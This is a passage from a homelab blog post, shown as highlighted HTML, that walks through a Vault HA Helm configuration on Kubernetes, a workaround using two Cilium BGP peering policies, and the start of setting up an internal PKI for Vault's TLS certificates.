</span></span><span style="display:flex;"><span>  <span style="color:#f92672">extraEnvironmentVars</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">VAULT_CACERT</span>: <span style="color:#e6db74">&#34;/vault/userconfig/vault-tls-certs/issuing_ca&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">standalone</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ha</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">raft</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">setNodeId</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">config</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        cluster_name = &#34;vault-k8s&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        ui = false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        disable_mlock = false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        listener &#34;tcp&#34; {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          address = &#34;[::]:8200&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          cluster_address = &#34;[::]:8201&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          tls_cert_file = &#34;/vault/userconfig/vault-tls-certs/certificate&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          tls_key_file  = &#34;/vault/userconfig/vault-tls-certs/private_key&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        storage &#34;raft&#34; {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          path = &#34;/vault/data&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          retry_join {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            leader_api_addr = &#34;https://vault-0.vault-internal:8200&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            leader_ca_cert_file = &#34;/vault/userconfig/vault-tls-certs/issuing_ca&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          retry_join {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            leader_api_addr = &#34;https://vault-1.vault-internal:8200&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            leader_ca_cert_file = &#34;/vault/userconfig/vault-tls-certs/issuing_ca&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          retry_join {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            leader_api_addr = &#34;https://vault-2.vault-internal:8200&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            leader_ca_cert_file = &#34;/vault/userconfig/vault-tls-certs/issuing_ca&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        service_registration &#34;kubernetes&#34; {}</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">3</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">ui</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">csi</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">serverTelemetry</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceMonitor</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>Let me explain. I&rsquo;m disabling the Ingress because I will make Vault accessible
via a LoadBalancer instead. There&rsquo;s no need to push it through Traefik, and
using it through Traefik would just mean one more service that needs to be up
and running before Vault is accessible.</p>
<p>Next, I&rsquo;m configuring the liveness probe. It needs to be reconfigured to make
sure that Vault also returns a <code>200</code> result when the pod being probed is in
standby. See also <a href="https://developer.hashicorp.com/vault/api-docs/system/health">these docs</a>.
And while setting Vault up, before initializing the cluster, just do yourself
the favor and completely disable the probes, or at least increase the <code>initialDelaySeconds</code>,
to prevent restarts while you&rsquo;re in the process of initializing the cluster.</p>
<p>Next, I&rsquo;m adding a toleration for <code>control-plane</code> nodes. This is mostly because
those are the only nodes with local storage, so they will be up first.</p>
<p>And then we come to the first problem with the chart, the service setup. In my
k8s cluster, I&rsquo;m using Cilium&rsquo;s BGP-based LoadBalancer support. And that requires
the Services Cilium looks at to have a specific, configurable label. But the
Vault Helm chart does not allow setting labels for the Services it creates.
Perhaps my use case is just really niche?
Anyway, I&rsquo;m enabling only the generic <code>vault</code> Service, set it to LoadBalancer
and, importantly, set the <code>externalTrafficPolicy</code> to <code>Local</code>. This means that
packets arriving for Vault will directly reach the node where the active Vault
Pod is running, instead of getting forwarded there by other nodes.
This is particularly important for Vault, because Vault can configure tokens
to be valid only when they&rsquo;re coming from certain IPs. This won&rsquo;t work when
the source IP looks like it&rsquo;s coming from another k8s node, instead of the actual
source host.
I&rsquo;m also setting a fixed IP to assign to the LoadBalancer, so I can easily set a
few choice firewall rules for access to that LoadBalancer.</p>
<p>After the Service configs follows the HA configuration. In this config, there can
be multiple Vault servers, continuously exchanging data. When the currently active
server goes down, another one can take over, and the previous leader goes into
the standby pool once its back.
Note that this is a high availability setup, not a load balancing setup. When
a request reaches a standby server, it is forwarded to the current active server.
The standby server never answers any requests, besides those to the health
endpoint, of course.
In my case, the HA config mostly consists of a config snippet for the Vault
config file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span>cluster_name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;vault-k8s&#34;</span>
</span></span><span style="display:flex;"><span>ui <span style="color:#f92672">=</span> <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>disable_mlock <span style="color:#f92672">=</span> <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">listener</span> <span style="color:#e6db74">&#34;tcp&#34;</span> {
</span></span><span style="display:flex;"><span>  address <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;[::]:8200&#34;</span>
</span></span><span style="display:flex;"><span>  cluster_address <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;[::]:8201&#34;</span>
</span></span><span style="display:flex;"><span>  tls_cert_file <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/vault/userconfig/vault-tls-certs/certificate&#34;</span>
</span></span><span style="display:flex;"><span>  tls_key_file  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/vault/userconfig/vault-tls-certs/private_key&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">storage</span> <span style="color:#e6db74">&#34;raft&#34;</span> {
</span></span><span style="display:flex;"><span>  path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/vault/data&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">retry_join</span> {
</span></span><span style="display:flex;"><span>    leader_api_addr <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://vault-0.vault-internal:8200&#34;</span>
</span></span><span style="display:flex;"><span>    leader_ca_cert_file <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/vault/userconfig/vault-tls-certs/issuing_ca&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">retry_join</span> {
</span></span><span style="display:flex;"><span>    leader_api_addr <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://vault-1.vault-internal:8200&#34;</span>
</span></span><span style="display:flex;"><span>    leader_ca_cert_file <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/vault/userconfig/vault-tls-certs/issuing_ca&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">retry_join</span> {
</span></span><span style="display:flex;"><span>    leader_api_addr <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://vault-2.vault-internal:8200&#34;</span>
</span></span><span style="display:flex;"><span>    leader_ca_cert_file <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/vault/userconfig/vault-tls-certs/issuing_ca&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">service_registration</span> <span style="color:#e6db74">&#34;kubernetes&#34;</span> {}
</span></span></code></pre></div><p>Most interesting here is the <code>retry_join</code> configuration, which needs to contain
the CA used to sign the TLS cert used in the <code>listener</code> stanza. I will explain
this more deeply in the next section, where I set up the cert generation.</p>
<p>Once that Helm chart gets deployed, a couple of things went wrong, leading to some
beautiful Yak shaving.</p>
<h2 id="setting-up-the-ciliumbgppeeringpolicy">Setting up the CiliumBGPPeeringPolicy</h2>
<p>As I&rsquo;ve noted above, the labels of the main Vault Service cannot be changed.
Interestingly, the two other services, for active and standby servers, do have
the option of configuring their labels. But not the main service.
Another issue: The type of the Services can only be set centrally, for all three
Services.</p>
<p>As you can read in a bit more detail <a href="https://blog.mei-home.net/posts/k8s-migration-2a-cilium-bgp/">here</a>,
I&rsquo;m using Cilium&rsquo;s BGP-based support for setting up LoadBalancer type services.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2alpha1&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumBGPPeeringPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">worker-node-bgp</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">kube-system</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">nodeSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/role&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;worker&#34;</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">virtualRouters</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">localASN</span>: <span style="color:#ae81ff">64555</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">exportPodCIDR</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">serviceSelector</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/public-service&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>              - <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">neighbors</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">peerAddress</span>: <span style="color:#e6db74">&#39;300.300.300.405/32&#39;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">peerASN</span>: <span style="color:#ae81ff">64555</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">eBGPMultihopTTL</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">connectRetryTimeSeconds</span>: <span style="color:#ae81ff">120</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">holdTimeSeconds</span>: <span style="color:#ae81ff">90</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">keepAliveTimeSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">gracefulRestart</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">restartTimeSeconds</span>: <span style="color:#ae81ff">120</span>
</span></span></code></pre></div><p>The main problem here is the <code>spec.virtualRouters[0].serviceSelector</code>, as it
only allows matching on labels - and I cannot influence the labels set on the
Vault Service. I then took a very close look at the Cilium docs and found out
that the selector can also select on the Service name and namespace. So I
tried extending the above config like this, adding another entry in the
<code>virtualRouters</code> list:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2alpha1&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumBGPPeeringPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">worker-node-bgp</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">kube-system</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">nodeSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/role&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;worker&#34;</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">virtualRouters</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">localASN</span>: <span style="color:#ae81ff">64555</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">exportPodCIDR</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">serviceSelector</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/public-service&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>              - <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">neighbors</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">peerAddress</span>: <span style="color:#e6db74">&#39;300.300.300.405/32&#39;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">peerASN</span>: <span style="color:#ae81ff">64555</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">eBGPMultihopTTL</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">connectRetryTimeSeconds</span>: <span style="color:#ae81ff">120</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">holdTimeSeconds</span>: <span style="color:#ae81ff">90</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">keepAliveTimeSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">gracefulRestart</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">restartTimeSeconds</span>: <span style="color:#ae81ff">120</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">localASN</span>: <span style="color:#ae81ff">64555</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">exportPodCIDR</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">serviceSelector</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;io.kubernetes.service.name&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>              - <span style="color:#e6db74">&#34;vault&#34;</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;io.kubernetes.service.namespace&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>              - <span style="color:#e6db74">&#34;vault&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">neighbors</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">peerAddress</span>: <span style="color:#e6db74">&#39;300.300.300.405/32&#39;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">peerASN</span>: <span style="color:#ae81ff">64555</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">eBGPMultihopTTL</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">connectRetryTimeSeconds</span>: <span style="color:#ae81ff">120</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">holdTimeSeconds</span>: <span style="color:#ae81ff">90</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">keepAliveTimeSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">gracefulRestart</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">restartTimeSeconds</span>: <span style="color:#ae81ff">120</span>
</span></span></code></pre></div><p>But, this did not work at all. Cilium announced either only the Services which
matched the first <code>serviceSelector</code> or the ones matching the second, but never
both. When debugging this issue, you can use <code>cilium bgp routes</code> to show which
routes cilium advertises to neighbors.</p>
<p>What did end up working was to introduce two peering policies. The hosts they
apply to seem to also have to avoid any overlap, or it again won&rsquo;t work.
I&rsquo;ve got it configured like this now:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2alpha1&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumBGPPeeringPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">worker-node-bgp</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">kube-system</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">nodeSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/role&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;worker&#34;</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">virtualRouters</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">localASN</span>: <span style="color:#ae81ff">64555</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">exportPodCIDR</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">serviceSelector</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/public-service&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>              - <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">neighbors</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">peerAddress</span>: <span style="color:#e6db74">&#39;300.300.300.405/32&#39;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">peerASN</span>: <span style="color:#ae81ff">64555</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">eBGPMultihopTTL</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">connectRetryTimeSeconds</span>: <span style="color:#ae81ff">120</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">holdTimeSeconds</span>: <span style="color:#ae81ff">90</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">keepAliveTimeSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">gracefulRestart</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">restartTimeSeconds</span>: <span style="color:#ae81ff">120</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2alpha1&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumBGPPeeringPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">controller-node-bgp</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">kube-system</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">nodeSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/role&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;controller&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">virtualRouters</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">localASN</span>: <span style="color:#ae81ff">64555</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">exportPodCIDR</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">serviceSelector</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;io.kubernetes.service.name&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>              - <span style="color:#e6db74">&#34;vault&#34;</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;io.kubernetes.service.namespace&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>              - <span style="color:#e6db74">&#34;vault&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">neighbors</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">peerAddress</span>: <span style="color:#e6db74">&#39;300.300.300.405/32&#39;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">peerASN</span>: <span style="color:#ae81ff">64555</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">eBGPMultihopTTL</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">connectRetryTimeSeconds</span>: <span style="color:#ae81ff">120</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">holdTimeSeconds</span>: <span style="color:#ae81ff">90</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">keepAliveTimeSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">gracefulRestart</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">restartTimeSeconds</span>: <span style="color:#ae81ff">120</span>
</span></span></code></pre></div><p>So one policy does the normal thing, for all of the Services where I can control
the labels, running on my Ceph and worker hosts.
Then there is the second policy, which only applies to the <code>vault</code> service in
the <code>vault</code> namespace. With that configuration, I got Cilium to announce both
of them.</p>
<h2 id="setting-up-the-certificates-for-vault">Setting up the certificates for Vault</h2>
<p>The next step, accounting for the majority of preparation work, was the certificate
setup. The Vault Pods need to be able to access each other, and they should do
it over HTTPS. So they need certificates. Initially, I did not realize that and
naively just told Vault to use my Let&rsquo;s Encrypt external cert. But of course
the Vault instances need to contact each other directly, not just the active
server available via the <code>newvault.example.com</code> address.</p>
<p>So I needed a specific certificate for Vault, with the following three SANs:</p>
<ul>
<li><code>vault-0.vault-internal</code></li>
<li><code>vault-1.vault-internal</code></li>
<li><code>vault-2.vault-internal</code></li>
</ul>
<p>And as I noted above, I&rsquo;ve already got an internal CA. And here is where I
knowingly committed a sin: That CA is provided by Vault, via the
<a href="https://developer.hashicorp.com/vault/docs/secrets/pki">PKI secrets engine</a>.
And I reused that CA for generating the Vault CA. Knowingly introducing a
dependency cycle into my setup. I feel a bit ashamed for it. But I also don&rsquo;t
want to introduce another complete PKI setup. And reusing the already existing
CA has the benefit that the CA cert is already widely deployed in my Homelab.</p>
<p>The first step is to set up a separate <a href="https://developer.hashicorp.com/vault/docs/secrets/pki/quick-start-intermediate-ca#configure-a-role">role</a>
for the certificate, so I can properly separate access to generating certificates
later.</p>
<p>I&rsquo;ve got all of my Vault configuration in Terraform, so I added the new role
there as well. Here is the full CA setup:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;vault_mount&#34; &#34;my-ca-mount&#34;</span> {
</span></span><span style="display:flex;"><span>  path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;my-ca&#34;</span>
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;pki&#34;</span>
</span></span><span style="display:flex;"><span>  default_lease_ttl_seconds <span style="color:#f92672">=</span> <span style="color:#ae81ff">157680000</span>
</span></span><span style="display:flex;"><span>  max_lease_ttl_seconds <span style="color:#f92672">=</span> <span style="color:#ae81ff">157680000</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;vault_pki_secret_backend_root_cert&#34; &#34;my-root-cert&#34;</span> {
